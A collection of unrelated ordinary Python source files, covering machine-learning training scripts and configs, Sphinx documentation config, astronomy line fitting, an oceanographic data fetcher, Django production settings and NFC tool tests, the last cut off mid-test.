'accelerator': 'ddp',
'precision': 16,
'accumulate_grad_batches': 8,
'profiler': None,
# for debugging: runs 1 train, val, test batch and program ends
'fast_dev_run': False,
'log_every_n_steps': 100,
'deterministic': True,
'default_root_dir': checkpoint_dir,
'logger': logger,
# turn off the warning
'plugins': [pl.plugins.DDPPlugin(find_unused_parameters=False)],
'callbacks': [checkpoint_callback],
'resume_from_checkpoint': args.load
}
if args.tiny:
trainer_config['limit_train_batches'] = 10
trainer_config['limit_val_batches'] = 10
trainer_config['limit_test_batches'] = 10
_info = {
**_info,
'output_checkpoint_filename': checkpoint_filename,
'model_config': model_config,
'trainer_config': trainer_config
}
print(f"Info: {json.dumps(_info, indent=4, default=str)}")
sweep_config = {
'method': 'random', # grid, random, bayesian
'metric': {
'name': 'val_object_f1',
'goal': 'maximize'
},
'parameters': {
'random_seed': {
'values': [model_config['random_seed']]
},
'learning_rate': {
'values': [model_config['learning_rate']]
},
'batch_size': {
'values': [model_config['batch_size']]
},
'epochs': {'value': model_config['epochs']},
'dropout': {
'values': [model_config['dropout']]
},
'max_seq_length': {'value': model_config['max_seq_length']},
}
}
model_config['random_seed'] = int(SEEDS[0])
pl.seed_everything(model_config['random_seed'], workers=True)
if args.mode == 'train':
main_train()
else:
if args.load is None:
print(f"WARNING! No model loaded, so testing with untrained model")
elif feature_str.replace('-tiny', '') not in args.load:
raise ValueError(
f"Input features do not match with loaded model: \n"
f"\t'{feature_str.replace('-tiny', '').replace('-object_counts=True', '')}' vs \n"
f"\t'{args.load}'")
if args.mode == 'test':
main_test(args.wandb_id)
elif args.mode == 'predict':
main_predict()
else:
print(f"mode not recognised: {args.mode}")
|
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/",one_hot=True)
type(mnist)
image_shape = mnist.train.images[1].shape
# plt.imshow(mnist.train.images[1].reshape(28,28))
# plt.imshow(mnist.train.images[1].reshape(28,28),cmap='gist_gray')
# mnist.train.images[1].max()
# plt.imshow(mnist.train.images[1].reshape(784,1))
# plt.imshow(mnist.train.images[1].reshape(784,1),cmap='gist_gray',aspect=0.02)
x = tf.placeholder("float",shape=[None,784])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.matmul(x,W) + b
y_true = tf.placeholder("float",[None,10])
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_true, logits=y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.3)
train = optimizer.minimize(cross_entropy)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(2000):
## PROVIDING BATCHES IN THE IN-BUILT METHOD PROVIDED BY TENSORFLOW
batch_x , batch_y = mnist.train.next_batch(150)
sess.run(train,feed_dict={
x:batch_x,
y_true:batch_y
})
## TESTING THE MODEL
matches = tf.equal(tf.argmax(y,1),tf.argmax(y_true,1))
accuracy = tf.reduce_mean(tf.cast(matches,"float"))
print(sess.run(accuracy, feed_dict={
x:mnist.test.images,
y_true:mnist.test.labels
}))
|
"""
This package/directory contains the
tcheasy & sorpa examples.
Feel free to take them as a blueprint.
"""
|
_base_ = [
'../_base_/models/sagan_128x128.py', '../_base_/datasets/imagenet_128.py',
'../_base_/default_runtime.py'
]
init_cfg = dict(type='studio')
model = dict(
generator=dict(num_classes=1000, init_cfg=init_cfg),
discriminator=dict(num_classes=1000, init_cfg=init_cfg),
)
lr_config = None
checkpoint_config = dict(interval=10000, by_epoch=False, max_keep_ckpts=20)
custom_hooks = [
dict(
type='VisualizeUnconditionalSamples',
output_dir='training_samples',
interval=1000)
]
inception_pkl = './work_dirs/inception_pkl/imagenet.pkl'
evaluation = dict(
type='GenerativeEvalHook',
interval=10000,
metrics=[
dict(
type='FID',
num_images=50000,
inception_pkl=inception_pkl,
bgr2rgb=True,
inception_args=dict(type='StyleGAN')),
dict(type='IS', num_images=50000)
],
best_metric=['fid', 'is'],
sample_kwargs=dict(sample_model='orig'))
n_disc = 1
total_iters = 1000000 * n_disc
# use ddp wrapper for faster training
use_ddp_wrapper = True
find_unused_parameters = False
runner = dict(
type='DynamicIterBasedRunner',
is_dynamic_ddp=False, # Note that this flag should be False.
pass_training_status=True)
metrics = dict(
fid50k=dict(
type='FID',
num_images=50000,
inception_pkl=inception_pkl,
inception_args=dict(type='StyleGAN')),
IS50k=dict(type='IS', num_images=50000))
optimizer = dict(
generator=dict(type='Adam', lr=0.0001, betas=(0.0, 0.999)),
discriminator=dict(type='Adam', lr=0.0004, betas=(0.0, 0.999)))
# train on 4 gpus
data = dict(samples_per_gpu=64)
|
'''
Переставить min и max
'''
def exchangeMinMax(a):
minEl = float('inf')
minId = -1
maxEl = float('-inf')
maxId = -1
for i in range(len(a)):
if (a[i] > maxEl):
maxEl = a[i]
maxId = i
if (a[i] < minEl):
minEl = a[i]
minId = i
(a[minId], a[maxId]) = (a[maxId], a[minId])
a = list(map(int, input().split()))
exchangeMinMax(a)
print(*a)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# nova documentation build configuration file
#
# Refer to the Sphinx documentation for advice on configuring this file:
#
# http://www.sphinx-doc.org/en/stable/config.html
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.graphviz',
'openstackdocstheme',
'sphinx_feature_classification.support_matrix',
'oslo_config.sphinxconfiggen',
'oslo_config.sphinxext',
'oslo_policy.sphinxpolicygen',
'oslo_policy.sphinxext',
'ext.versioned_notifications',
'ext.feature_matrix',
'sphinxcontrib.actdiag',
'sphinxcontrib.seqdiag',
'sphinxcontrib.rsvgconverter',
]
# openstackdocstheme options
repository_name = 'openstack/nova'
bug_project = 'nova'
bug_tag = 'doc'
config_generator_config_file = '../../etc/nova/nova-config-generator.conf'
sample_config_basename = '_static/nova'
policy_generator_config_file = [
('../../etc/nova/nova-policy-generator.conf', '_static/nova'),
]
actdiag_html_image_format = 'SVG'
actdiag_antialias = True
seqdiag_html_image_format = 'SVG'
seqdiag_antialias = True
todo_include_todos = True
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = u'2010-present, OpenStack Foundation'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
_man_pages = [
('nova-api', u'Cloud controller fabric'),
('nova-api-metadata', u'Cloud controller fabric'),
('nova-api-os-compute', u'Cloud controller fabric'),
('nova-compute', u'Cloud controller fabric'),
('nova-conductor', u'Cloud controller fabric'),
('nova-manage', u'Cloud controller fabric'),
('nova-novncproxy', u'Cloud controller fabric'),
('nova-rootwrap', u'Cloud controller fabric'),
('nova-scheduler', u'Cloud controller fabric'),
('nova-serialproxy', u'Cloud controller fabric'),
('nova-spicehtml5proxy', u'Cloud controller fabric'),
('nova-status', u'Cloud controller fabric'),
('nova-xvpvncproxy', u'Cloud controller fabric'),
]
man_pages = [
('cli/%s' % name, name, description, [u'OpenStack'], 1)
for name, description in _man_pages]
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'openstackdocs'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any paths that contain "extra" files, such as .htaccess or
# robots.txt.
html_extra_path = ['_extra']
# -- Options for LaTeX output -------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'doc-nova.tex', u'Nova Documentation',
u'OpenStack Foundation', 'manual'),
]
# Allow deeper levels of nesting for \begin...\end stanzas
latex_elements = {
'maxlistdepth': 10,
'extraclassoptions': 'openany,oneside',
'preamble': r'''
\setcounter{tocdepth}{3}
\setcounter{secnumdepth}{3}
''',
}
# Disable use of xindy since that's another binary dependency that's not
# available on all platforms
latex_use_xindy = False
# -- Options for openstackdocstheme -------------------------------------------
# keep this ordered to keep mriedem happy
#
# NOTE(stephenfin): Projects that don't have a release branch, like TripleO and
# reno, should not be included here
openstack_projects = [
'ceilometer',
'cinder',
'glance',
'horizon',
'ironic',
'keystone',
'neutron',
'nova',
'oslo.log',
'oslo.messaging',
'oslo.i18n',
'oslo.versionedobjects',
'placement',
'python-novaclient',
'python-openstackclient',
'watcher',
]
# -- Custom extensions --------------------------------------------------------
# NOTE(mdbooth): (2019-03-20) Sphinx loads policies defined in setup.cfg, which
# includes the placement policy at nova/api/openstack/placement/policies.py.
# Loading this imports nova/api/openstack/__init__.py, which imports
# nova.monkey_patch, which will do eventlet monkey patching to the sphinx
# process. As well as being unnecessary and a bad idea, this breaks on
# python3.6 (but not python3.7), so don't do that.
os.environ['OS_NOVA_DISABLE_EVENTLET_PATCHING'] = '1'
def monkey_patch_blockdiag():
"""Monkey patch the blockdiag library.
The default word wrapping in blockdiag is poor, and breaks on a fixed
text width rather than on word boundaries. There's a patch submitted to
resolve this [1]_ but it's unlikely to merge anytime soon.
In addition, blockdiag monkey patches a core library function,
``codecs.getreader`` [2]_, to work around some Python 3 issues. Because
this operates in the same environment as other code that uses this library,
it ends up causing issues elsewhere. We undo these destructive changes
pending a fix.
TODO: Remove this once blockdiag is bumped to 1.6, which will hopefully
include the fix.
.. [1] https://bitbucket.org/blockdiag/blockdiag/pull-requests/16/
.. [2] https://bitbucket.org/blockdiag/blockdiag/src/1.5.3/src/blockdiag/utils/compat.py # noqa
"""
import codecs
from codecs import getreader
from blockdiag.imagedraw import textfolder
# oh, blockdiag. Let's undo the mess you made.
codecs.getreader = getreader
def splitlabel(text):
"""Split text to lines as generator.
Every line will be stripped. If text includes characters "\n\n", treat
as line separator. Ignore '\n' to allow line wrapping.
"""
lines = [x.strip() for x in text.splitlines()]
out = []
for line in lines:
if line:
out.append(line)
else:
yield ' '.join(out)
out = []
yield ' '.join(out)
def splittext(metrics, text, bound, measure='width'):
folded = [' ']
for word in text.split():
# Try appending the word to the last line
tryline = ' '.join([folded[-1], word]).strip()
textsize = metrics.textsize(tryline)
if getattr(textsize, measure) > bound:
# Start a new line. Appends `word` even if > bound.
folded.append(word)
else:
folded[-1] = tryline
return folded
# monkey patch those babies
textfolder.splitlabel = splitlabel
textfolder.splittext = splittext
monkey_patch_blockdiag()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import inspect
import numpy as np
import emcee
import george
from george import kernels
import os
import sys
currentframe = inspect.currentframe()
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(currentframe)))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import profiles
import gpew
import matplotlib.pyplot as pl
def single_kernel_noisemodel(p):
"""
Simple one squared-exponential kernel noise model.
"""
return george.GP(p[0] * kernels.ExpSquaredKernel(p[1]))
def single_kernel_lnprior(p):
amp, xcen, sigma, lna, lnalpha = p
if (-50. < lna < 0. and amp > 0. and sigma > 0. and xcen > 8685 and
xcen < 8690):
return 0.0
return -np.inf
def chi2_lnprior(p):
amp, xcen, sigma = p
if (amp > 0. and sigma > 0. and xcen > 8685 and xcen < 8690):
return 0.0
return -np.inf
d = np.loadtxt('spec.txt').T
sel = (d[0] > 8680) & (d[0] < 8696)
yerr = np.ones_like(d[0][sel]) * 0.01
lines = [(d[0][sel], d[1][sel], yerr)]
pfiles = [profiles.gaussian]
pparn = np.cumsum([0] +\
[len(inspect.getargspec(i)[0]) - 1 for i in pfiles])
###############################################################################
# GP modelled line
initial = [0.28, 8687.82, 1.53, -6.1, 0.3]
nwalkers = 128
ndim = len(initial)
niter = 100
noisemodel = single_kernel_noisemodel
data = [lines, pfiles, pparn, noisemodel, single_kernel_lnprior]
p0 = np.array([np.array(initial) + 1e-2 * np.random.randn(ndim)
for i in xrange(nwalkers)])
sampler = emcee.EnsembleSampler(nwalkers, ndim, gpew.lnprob, args=data)
p0, lnp, _ = sampler.run_mcmc(p0, niter)
sampler.reset()
p = p0[np.argmax(lnp)]
p0 = [p + 1e-2 * np.random.randn(ndim) for i in xrange(nwalkers)]
p0, _, _ = sampler.run_mcmc(p0, niter)
samples = sampler.flatchain
xcen = samples[:, 1]
mxcen = np.mean(xcen)
xs = np.linspace(-8.1, 8.1, 100)
models = []
clean_models = []
ew = []
for s in samples[np.random.randint(len(samples), size=100)]:
pars = s[pparn[0]:pparn[1]]
profile = 1 - pfiles[0](lines[0][0], *pars)
profilexs = 1 - pfiles[0](xs + mxcen, *pars)
clean_models.append(profilexs)
ew.append(np.sum((1 - profilexs[1:]) * (xs[1:] - xs[:-1])))
if noisemodel is not None:
nmp = np.exp(s[pparn[-1]:])
nm = noisemodel(nmp)
nm.compute(lines[0][0], lines[0][2])
m = nm.sample_conditional(lines[0][1] - profile,
xs + mxcen) + profilexs
models.append(m)
offset = 0.0
pl.errorbar(lines[0][0] - mxcen, lines[0][1] + offset, yerr=lines[0][2],
fmt=".k", capsize=0)
pl.text(xs[0], offset + 1.02, '%.2f +- %.2f' % (np.mean(ew),
np.std(ew)))
la = np.array(clean_models).T
lstd = np.std(la, axis=1)
lavg = np.average(la, axis=1)
y1, y2 = lavg + lstd + offset, lavg - lstd + offset
pl.fill_between(xs, y1, y2, alpha=0.3)
gpa = np.array(models).T
gpstd = np.std(gpa, axis=1)
gpavg = np.average(gpa, axis=1)
y1, y2 = gpavg + gpstd + offset, gpavg - gpstd + offset
pl.fill_between(xs, y1, y2, color='r', alpha=0.3)
###############################################################################
# Chi2 modelled line
initial = [0.28, 8687.82, 1.53]
ndim = len(initial)
noisemodel = None
data = [lines, pfiles, pparn, noisemodel, chi2_lnprior]
p0 = np.array([np.array(initial) + 1e-2 * np.random.randn(ndim)
for i in xrange(nwalkers)])
sampler = emcee.EnsembleSampler(nwalkers, ndim, gpew.lnprob, args=data)
p0, lnp, _ = sampler.run_mcmc(p0, niter)
sampler.reset()
p = p0[np.argmax(lnp)]
p0 = [p + 1e-2 * np.random.randn(ndim) for i in xrange(nwalkers)]
p0, _, _ = sampler.run_mcmc(p0, niter)
samples = sampler.flatchain
xcen = samples[:, 1]
mxcen = np.mean(xcen)
clean_models = []
ew = []
for s in samples[np.random.randint(len(samples), size=100)]:
pars = s[pparn[0]:pparn[1]]
profilexs = 1 - pfiles[0](xs + mxcen, *pars)
clean_models.append(profilexs)
ew.append(np.sum((1 - profilexs[1:]) * (xs[1:] - xs[:-1])))
offset = 0.3
pl.errorbar(lines[0][0] - mxcen, lines[0][1] + offset, yerr=lines[0][2],
fmt=".k", capsize=0)
pl.text(xs[0], offset + 1.02, '%.2f +- %.2f' % (np.mean(ew),
np.std(ew)))
la = np.array(clean_models).T
lstd = np.std(la, axis=1)
lavg = np.average(la, axis=1)
y1, y2 = lavg + lstd + offset, lavg - lstd + offset
pl.fill_between(xs, y1, y2, alpha=0.3)
pl.show()
|
#!/bin/env python
# -*coding: UTF-8 -*-
#
# Argo data fetcher for Argovis.
# Code borrows heavily from API gathered at:
# https://github.com/earthcube2020/ec20_tucker_etal/blob/master/EC2020_argovis_python_api.ipynb
#
# This is comprised of functions used to query Argovis api
# query functions either return dictionary objects or error messages.
#
import numpy as np
import pandas as pd
import xarray as xr
import json
import getpass
from .proto import ArgoDataFetcherProto
from abc import abstractmethod
import warnings
from argopy.stores import httpstore
from argopy.options import OPTIONS
from argopy.utilities import list_standard_variables
from argopy.errors import DataNotFound
from argopy.plotters import open_dashboard
access_points = ['wmo', 'box']
exit_formats = ['xarray']
dataset_ids = ['phy'] # First is default
api_server = 'https://argovis.colorado.edu' # API root url
api_server_check = api_server + '/catalog' # URL to check if the API is alive
class ArgovisDataFetcher(ArgoDataFetcherProto):
###
# Methods to be customised for a specific Argovis request
###
@abstractmethod
def init(self):
""" Initialisation for a specific fetcher """
pass
@abstractmethod
def cname(self):
""" Return a unique string defining the request
Provide this string to populate meta data and titles
"""
pass
@property
def url(self):
""" Return the URL used to download data """
pass
###
# Methods that must not change
###
def __init__(self,
ds: str = "",
cache: bool = False,
cachedir: str = "",
**kwargs):
""" Instantiate an Argovis Argo data loader
Parameters
----------
ds: 'phy'
cache : False
cachedir : None
"""
self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=120)
self.definition = 'Argovis Argo data fetcher'
self.dataset_id = OPTIONS['dataset'] if ds == '' else ds
self.server = api_server
self.init(**kwargs)
self.key_map = {
'date': 'TIME',
'date_qc': 'TIME_QC',
'lat': 'LATITUDE',
'lon': 'LONGITUDE',
'cycle_number': 'CYCLE_NUMBER',
'DATA_MODE': 'DATA_MODE',
'DIRECTION': 'DIRECTION',
'platform_number': 'PLATFORM_NUMBER',
'position_qc': 'POSITION_QC',
'pres': 'PRES',
'temp': 'TEMP',
'psal': 'PSAL',
'index': 'N_POINTS'
}
def __repr__(self):
summary = ["<datafetcher '%s'>" % self.definition]
summary.append("Domain: %s" % self.cname())
return '\n'.join(summary)
def _add_history(self, this, txt):
if 'history' in this.attrs:
this.attrs['history'] += "; %s" % txt
else:
this.attrs['history'] = txt
return this
def json2dataframe(self, profiles):
""" convert json data to Pandas DataFrame """
# Make sure we deal with a list
if isinstance(profiles, list):
data = profiles
else:
data = [profiles]
# Transform
rows = []
for profile in data:
keys = [x for x in profile.keys() if x not in ['measurements', 'bgcMeas']]
meta_row = dict((key, profile[key]) for key in keys)
for row in profile['measurements']:
row.update(meta_row)
rows.append(row)
df = pd.DataFrame(rows)
return df
def to_dataframe(self):
""" """
results = []
urls = self.url
if isinstance(urls, str):
urls = [urls] # Make sure we deal with a list
for url in urls:
js = self.fs.open_json(url)
if isinstance(js, str):
continue
df = self.json2dataframe(js)
df = df.reset_index()
df = df.rename(columns=self.key_map)
df = df[[value for value in self.key_map.values() if value in df.columns]]
results.append(df)
results = [r for r in results if r is not None] # Only keep non-empty results
if len(results) > 0:
df = pd.concat(results, ignore_index=True)
df.sort_values(by=['TIME', 'PRES'], inplace=True)
df = df.set_index(['N_POINTS'])
# df['N_POINTS'] = np.arange(0, len(df['N_POINTS'])) # Re-index to avoid duplicate values
return df
else:
raise DataNotFound("CAN'T FETCH ANY DATA !")
def to_xarray(self):
""" Download and return data as xarray Datasets """
ds = self.to_dataframe().to_xarray()
ds = ds.sortby(['TIME', 'PRES']) # should already be sorted by date in decending order
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS'])) # Re-index to avoid duplicate values
# Set coordinates:
# ds = ds.set_coords('N_POINTS')
coords = ('LATITUDE', 'LONGITUDE', 'TIME', 'N_POINTS')
ds = ds.reset_coords()
ds['N_POINTS'] = ds['N_POINTS']
# Convert all coordinate variable names to upper case
for v in ds.data_vars:
ds = ds.rename({v: v.upper()})
ds = ds.set_coords(coords)
# Cast data types and add variable attributes (not available in the csv download):
ds = ds.argo.cast_types()
# Remove argovis file attributes and replace them with argopy ones:
ds.attrs = {}
if self.dataset_id == 'phy':
ds.attrs['DATA_ID'] = 'ARGO'
elif self.dataset_id == 'ref':
ds.attrs['DATA_ID'] = 'ARGO_Reference'
elif self.dataset_id == 'bgc':
ds.attrs['DATA_ID'] = 'ARGO-BGC'
ds.attrs['DOI'] = 'http://doi.org/10.17882/42182'
ds.attrs['Fetched_from'] = self.server
ds.attrs['Fetched_by'] = getpass.getuser()
ds.attrs['Fetched_date'] = pd.to_datetime('now').strftime('%Y/%m/%d')
ds.attrs['Fetched_constraints'] = self.cname()
ds.attrs['Fetched_uri'] = self.url
ds = ds[np.sort(ds.data_vars)]
return ds
def filter_data_mode(self, ds, **kwargs):
# Argovis data already curated !
# ds = ds.argo.filter_data_mode(errors='ignore', **kwargs)
if ds.argo._type == 'point':
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))
return ds
def filter_qc(self, ds, **kwargs):
# Argovis data already curated !
# ds = ds.argo.filter_qc(**kwargs)
if ds.argo._type == 'point':
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))
return ds
def filter_variables(self, ds, mode='standard'):
if mode == 'standard':
to_remove = sorted(list(set(list(ds.data_vars)) - set(list_standard_variables())))
return ds.drop_vars(to_remove)
else:
return ds
class Fetch_wmo(ArgovisDataFetcher):
def init(self, WMO=[], CYC=None):
""" Create Argo data loader for WMOs and CYCs
Parameters
----------
WMO : list(int)
The list of WMOs to load all Argo data for.
CYC : int, np.array(int), list(int)
The cycle numbers to load.
"""
if isinstance(WMO, int):
WMO = [WMO] # Make sure we deal with a list
if isinstance(CYC, int):
CYC = np.array((CYC,), dtype='int') # Make sure we deal with an array of integers
if isinstance(CYC, list):
CYC = np.array(CYC, dtype='int') # Make sure we deal with an array of integers
self.WMO = WMO
self.CYC = CYC
self.definition = "?"
if self.dataset_id == 'phy':
self.definition = 'Argovis Argo data fetcher for floats'
return self
def cname(self):
""" Return a unique string defining the constraints """
if len(self.WMO) > 1:
listname = ["WMO%i" % i for i in self.WMO]
if isinstance(self.CYC, (np.ndarray)):
[listname.append("CYC%0.4d" % i) for i in self.CYC]
listname = ";".join(listname)
else:
listname = "WMO%i" % self.WMO[0]
if isinstance(self.CYC, (np.ndarray)):
listname = [listname]
[listname.append("CYC%0.4d" % i) for i in self.CYC]
listname = "_".join(listname)
listname = self.dataset_id + "_" + listname
return listname
@property
def url(self):
""" Return the URL used to download data """
urls = []
if isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:
profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]
urls.append((self.server + '/catalog/mprofiles/?ids={}').format(profIds).replace(' ', ''))
# elif self.dataset_id == 'bgc' and isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:
# profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]
# urls.append((self.server + '/catalog/profiles/{}').format(self.CYC))
else:
for wmo in self.WMO:
urls.append((self.server + '/catalog/platforms/{}').format(str(wmo)))
if len(urls) == 1:
return urls[0]
else:
return urls
def dashboard(self, **kw):
if len(self.WMO) == 1:
return open_dashboard(wmo=self.WMO[0], **kw)
else:
warnings.warn("Plot dashboard only available for one float frequest")
class Fetch_box(ArgovisDataFetcher):
def init(self, box: list):
""" Create Argo data loader
Parameters
----------
box : list(float, float, float, float, float, float, str, str)
The box domain to load all Argo data for:
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]
"""
if len(box) == 6:
# Select the last months of data:
end = pd.to_datetime('now')
start = end - pd.DateOffset(months=1)
box.append(start.strftime('%Y-%m-%d'))
box.append(end.strftime('%Y-%m-%d'))
elif len(box) != 8:
raise ValueError('Box must 6 or 8 length')
self.BOX = box
self.definition = '?'
if self.dataset_id == 'phy':
self.definition = 'Argovis Argo data fetcher for a space/time region'
return self
def cname(self):
""" Return a unique string defining the constraints """
BOX = self.BOX
boxname = ("[x=%0.2f/%0.2f; y=%0.2f/%0.2f; z=%0.1f/%0.1f; t=%s/%s]") % \
(BOX[0], BOX[1], BOX[2], BOX[3], BOX[4], BOX[5],
self._format(BOX[6], 'tim'), self._format(BOX[7], 'tim'))
boxname = self.dataset_id + "_" + boxname
return boxname
@property
def url(self):
""" Return the URL used to download data """
shape = [[[self.BOX[0], self.BOX[2]], [self.BOX[0], self.BOX[3]], [self.BOX[1], self.BOX[3]],
[self.BOX[1], self.BOX[2]], [self.BOX[0], self.BOX[2]]]]
strShape = str(shape).replace(' ', '')
url = self.server + '/selection/profiles'
url += '?startDate={}'.format(self.BOX[6])
url += '&endDate={}'.format(self.BOX[7])
url += '&shape={}'.format(strShape)
url += '&presRange=[{},{}]'.format(self.BOX[4], self.BOX[5])
return url
|
from .awslambdaevent import *
from .awslambda import *
|
import sys
import logging
def get_rpc_update():
# Grabs data from applications
logging.debug("Checking OS...")
if sys.platform in ['Windows', 'win32', 'cygwin']:
# Windows data retrieval
try:
logging.debug("Importing Windows specific modules...")
from api.windows import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info != None:
# Information to publically show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info == None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"Required dependency is not found! Did install all dependencies? Check with the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
elif sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
# macOS data retrieval
try:
logging.debug("Importing macOS specific modules...")
from api.macos import get_title, get_process_info, get_status
app_info = get_process_info()
if app_info != None:
# Information to publically show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
# If 'get_process_info()' doesn't find a proper 'processName' element, stop application
elif app_info == None:
logging.error("Unable to find process")
except ImportError:
logging.error(
"Required dependency is not found! Did install all dependencies? Check with the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
else:
logging.error("Unknown operating system! Exiting...")
logging.error("If you believe this is an error. Submit a bug report.")
raise SystemExit(0)
def exception_handler(exception, future):
logging.exception("Something bad happened. Printing stacktrace...")
|
from .base import *
DEBUG = False
ALLOWED_HOSTS = [
get_secret('ALLOWED_HOSTS'),
'www.' + get_secret('ALLOWED_HOSTS'),
]
WSGI_APPLICATION = 'project.wsgi_prod.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',#this is different!
'NAME': get_secret('NAME'),
'USER': get_secret('USER'),
'PASSWORD': get_secret('PASSWORD'),
'HOST': get_secret('HOST'),
'PORT': get_secret('PORT'),
},
}
RECAPTCHA_PUBLIC_KEY = get_secret('RECAPTCHA_PUBLIC_KEY')
RECAPTCHA_PRIVATE_KEY = get_secret('RECAPTCHA_PRIVATE_KEY')
# Mail configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = get_secret('EMAIL_HOST')
EMAIL_PORT = get_secret('EMAIL_PORT')
EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD')
EMAIL_USE_SSL = True
SERVER_EMAIL = get_secret('SERVER_EMAIL')
DEFAULT_FROM_EMAIL = get_secret('DEFAULT_FROM_EMAIL')
DEFAULT_RECIPIENT = get_secret('DEFAULT_RECIPIENT')
STATIC_ROOT = get_secret('STATIC_ROOT')# no trailing slash
STATIC_URL = get_secret('BASE_URL') + '/static/'
MEDIA_ROOT = get_secret('MEDIA_ROOT')# no trailing slash
MEDIA_URL = get_secret('BASE_URL') + '/media/'
PRIVATE_STORAGE_ROOT = get_secret('PRIVATE_STORAGE_ROOT')
PRIVATE_STORAGE_AUTH_FUNCTION = get_secret('PRIVATE_STORAGE_AUTH_FUNCTION')
SECRET_KEY = get_secret('SECRET_KEY')
REST_API_TARGET = get_secret('REST_API_TARGET') + '/wp-json/wp/v2/'
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = get_secret('BASE_URL')
try:
from .local import *
except ImportError:
pass
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import pytest
from ndeftool.cli import main
@pytest.fixture
def runner():
import click.testing
return click.testing.CliRunner()
@pytest.yield_fixture
def isolated_runner(runner):
with runner.isolated_filesystem():
yield runner
def test_help_option_prints_usage(runner):
result = runner.invoke(main, ['smartposter', '--help'])
assert result.exit_code == 0
assert result.output.startswith(
'Usage: main smartposter [OPTIONS] RESOURCE')
def test_abbreviated_command_name(runner):
result = runner.invoke(main, ['smp', '--help'])
assert result.exit_code == 0
assert result.output.startswith('Usage: main smp [OPTIONS] RESOURCE')
def test_debug_option_prints_kwargs(runner):
params = '--debug smartposter http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.output.startswith("ndeftool.commands.SMartPoster {")
def test_smartposter_with_no_options(runner):
params = 'smartposter http://nfcpy.org'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == b'\xd1\x02\x0eSp\xd1\x01\nU\x03nfcpy.org'
def test_two_smartposter_commands(runner):
params = 'smartposter http://nfcpy.org smartposter tel:12'.split()
result = runner.invoke(main, params)
assert result.exit_code == 0
assert result.stdout_bytes == \
b'\x91\x02\x0eSp\xd1\x01\nU\x03nfcpy.orgQ\x02\x07Sp\xd1\x01\x03U\x0512'
def test_smartposter_with_english_title(runner):
params = 'smartposter -T Title http://nfcpy.org'.split()
